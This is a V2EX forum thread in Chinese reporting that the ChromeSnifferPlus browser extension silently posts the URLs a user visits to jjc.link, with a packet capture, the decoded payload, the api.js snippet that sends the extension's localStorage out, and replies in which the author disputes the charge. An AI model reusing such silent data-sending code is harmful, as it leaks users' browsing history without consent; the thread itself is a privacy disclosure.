ChromeSnifferPlus 插件疑似恶意采集用户访问信息

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

已注册用户请登录

这是一个创建于 3034 天前的主题，其中的信息可能已经有所发展或是发生改变。

ChromeSnifferPlus 是国人开发的一款开源网站探测插件,可以探测正在使用的开源软件或者 js 类库，在国内外都有一定的使用群体
该插件会一定条件下把用户访问过的 url 地址，秘密发送到一个美国服务器
服务器 URL 地址为

http://jjc.link/status/v2

wireshark 抓包

POST /status/v2 HTTP/1.1
Host: jjc.link
Connection: keep-alive
Content-Length: 1126
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Origin: chrome-extension://modoldoikofeihcogpldkollonflkdic
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

ld=%7B%22http%3A%2F%2Fqunaer.com%2F%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22%E7%99%BE%E5%BA%A6%E7%BB%9F%E8%AE%A1%5C%5C%5C%22%3A-1%2C%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.9.1%5C%5C%5C%22%2C%5C%5C%5C%22jQuery%20UI%5C%5C%5C%22%3A%5C%5C%5C%221.10.3%5C%5C%5C%22%2C%5C%5C%5C%22PHP%5C%5C%5C%22%3A%5C%5C%5C%225.2.17p1%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451980052484%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2F%3Frfrom%3Dsoso%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979843360%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2Fweb%3Fquery%3Dmanager%26_asf%3Dwww.sogou.com%26_ast%3D%26ie%3Dutf8%26pid%3Ds.idx%26cid%3Ds.idx.se%26rfrom%3Dsoso%26unc%3D%26w%3D01019900%26sut%3D1368%26sst0%3D1451979849303%26lkt%3D7%252C1451979847939%252C1451979849111%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979854478%7D%22%7DHTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Jan 2016 07:47:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

14
....................
0

数据包解密内容

ld={"http://qunaer.com/":"{\"libs\":\"{\\\"百度统计\\\":-1,\\\"jQuery\\\":\\\"1.9.1\\\",\\\"jQuery UI\\\":\\\"1.10.3\\\",\\\"PHP\\\":\\\"5.2.17p1\\\",\\\"nginx\\\":-1}\",\"add_time\":1451980052484}","http://www.sogou.com/?rfrom=soso":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979843360}","http://www.sogou.com/web?query=manager&_asf=www.sogou.com&_ast=&ie=utf8&pid=s.idx&cid=s.idx.se&rfrom=soso&unc=&w=01019900&sut=1368&sst0=1451979849303&lkt=7%2C1451979847939%2C1451979849111":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979854478}"}

经过多次抓包，发现服务器返回值都为 14/0,所以基本可以判断不是云查询类功能

作者在 github 的开源地址为

https://github.com/justjavac/ChromeSnifferPlus

代码不多，经过排查，发现窃取信息的 js 为

https://github.com/justjavac/ChromeSnifferPlus/blob/master/js/api.js

代码片段

var url = 'http://jjc.link/status/v2';

        if (localStorage.length === 0) {
            return;
        }

        var data = "ld=" + encodeURIComponent(JSON.stringify(localStorage));

        xhr('POST', url, data, function(data, status, response){
            callback();
        });

该插件会把访问过的 url 都归类发往 jjc.link 服务器，根据网站的验证方式不同，可能会泄露的隐私

用户 ip
访问过的网站地址
网站后台
用户名 /密码（ get 方式）
session 值(get 方式)

暂时不知作者收集这些信息的目的，请使用 ChromeSnifferPlus 的用户多加小心

19 条回复 • 2016-01-07 19:56:52 +08:00

Ellison

2016-01-06 11:45:28 +08:00

@justjavac
直接圈作者啊

zwbai

2016-01-06 13:09:57 +08:00

奇怪我文章首页显示为什么会显示一天前呢

Tink

2016-01-06 13:13:51 +08:00

关注

Tink

2016-01-06 13:14:02 +08:00

@zwbai 下方又个置顶

oott123

2016-01-06 13:18:16 +08:00

居然发送 localStorage ，这地没法洗了吧。
没听说过什么统计脚本要统计 localStorage 的。

mcone

2016-01-06 19:46:20 +08:00

好奇怪的访问不懂 bd

coolzilj

2016-01-07 13:20:13 +08:00 via iPhone

作者已回复， https://github.com/justjavac/ChromeSnifferPlus/issues/58
这理由…接受不了把 localstorage 发送给别人，已卸

justjavac

2016-01-07 16:25:24 +08:00

所有代码都是开源的，大家可以审视

ooTwToo

2016-01-07 16:26:26 +08:00

wappalyzer 不知有没有这个问题

xbflrghc

2016-01-07 16:30:58 +08:00

这个不是开源的吗？到底收集了啥，看看不就知道了吗？

xbflrghc

2016-01-07 16:32:35 +08:00

@oott123
@coolzilj

插件只能访问插件记录的 localstorage ，这个应该不是发送了用户浏览器的 localstorage

xbflrghc

2016-01-07 16:52:57 +08:00

@ooTwToo https://github.com/AliasIO/Wappalyzer/blob/master/src/drivers/chrome/js/driver.js#L208_L242

wappalyzer 的源码

w.driver.post('https://ad.wappalyzer.com/log/wp/', w.adCache);

xhr.send('json=' + encodeURIComponent(JSON.stringify(data)));

justjavac

2016-01-07 17:03:06 +08:00

@coolzilj

"这理由…接受不了把 localstorage 发送给别人，已卸"

有必要解释一下了。不要代码片段而断章取义。我没有把 localstorage 发给别人，也没有访问用户的任何 localstorage 信息。

这个文件的代码运行在 background ，而 background 的代码是无法访问页面的，只能访问插件。这里的 localstorage 是插件为了存储探测到的信息而使用的。然后把信息发送到分析服务器。

ooTwToo

2016-01-07 17:44:34 +08:00

@xbflrghc 啊好吧，并没有把上传全部的 localstorage 。

oott123

2016-01-07 18:17:59 +08:00

好吧，如果是插件自己的 localStorage ，问题不大。

不过好在我也没用，哈哈哈（

zwbai

2016-01-07 18:26:57 +08:00

安装插件后，访问所有网站都会默认开启网站探测，发送插件自己的 localStorage ，意味着用插件期间访问什么还是发什么啊，也就是发送所有浏览记录，原来 360 云采集信息泄露， get 方式的验证密码的也是很多。。

zwbai

2016-01-07 18:38:56 +08:00

@xbflrghc @oott123 @justjavac 因为是个全局插件，全 url 地址采集，泄露敏感信息肯定是不可避免的，比如我看个小黄片啥的..隐私泄露具体可搜索 "360 隐私泄露门的演变时间表"做参考

oott123

2016-01-07 19:55:25 +08:00

@zwbai 这确实是会导致隐私泄漏问题，然而比上传 localStorage 的危害小多了。
#反正我也不用#
另外看更新记录，已经增加了选项去掉这个功能。

oott123

2016-01-07 19:56:52 +08:00

@oott123 看错了，是“将要”增加，不是“已经”增加。